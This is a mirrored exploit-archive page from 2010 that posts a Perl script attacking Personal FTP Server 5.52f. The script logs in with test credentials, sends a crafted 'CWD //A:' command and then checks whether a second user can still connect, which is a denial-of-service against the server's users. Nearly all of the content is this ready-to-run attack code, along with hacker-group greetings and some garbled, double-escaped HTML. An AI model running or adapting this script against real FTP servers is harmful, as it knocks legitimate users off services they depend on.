Home / os / win7

Personal FTP Server 5.52f Exploit

Posted on 01 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Personal FTP Server 5.52f Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================= Personal FTP Server 5.52f Exploit ================================= #!/usr/bin/perl ############################################################################ # # Exploit Title: Personal FTP Server 5.52f bug # Date: 01/08/2010 # Author: TA4G - S8T@hotmail.com # Download: Personal FTP-Server PRO [deutsch] v5.52 Limitierte Shareware Version # Download: http://www.michael-roth-software.de/prosharegerman.zip # It's rather a bug then a DoS which consist in denying other users access to the ftp server, after a previous user triggered a //A: command # Version: 5.52 # Google dork : n/a # Platform / Tested on: windows 7 # Category: webapps/0day # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST _ Sn!p3r_P4L # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Gr33tz to ### ArHack.NeT ### # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= use Net::FTP; (($target = $ARGV[0])) || die &amp;quot;usage:$0 &lt;target&gt; &lt;port&gt;&amp;quot;; my $user = &amp;quot;test&amp;quot;; my $pass = &amp;quot;test&amp;quot;; $expl = &amp;quot;//A:&amp;quot;; $ftp = Net::FTP-&gt;new($target, Debug =&gt; 0, Port =&gt; 21) || die &amp;quot;Nu m-am putut conecta: $!&amp;quot;; $ftp-&gt;login($user,$pass) || die &amp;quot;Nu m-am putut loga: $!&amp;quot;; print &amp;quot;M-am logat!n&amp;quot;; $ftp-&gt;command(&amp;quot;CWD&amp;quot;, $expl); print &amp;quot;Lansez comanda in executie...n&amp;quot;; print &amp;quot;Incerc sa ma conectez din nou..n&amp;quot;; $ftp = Net::FTP-&gt;new($target, Debug =&gt; 0, Port =&gt; 21) || die &amp;quot;Userul 2 nu se mai poate conecta: $!&amp;quot;; $ftp-&gt;quit; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP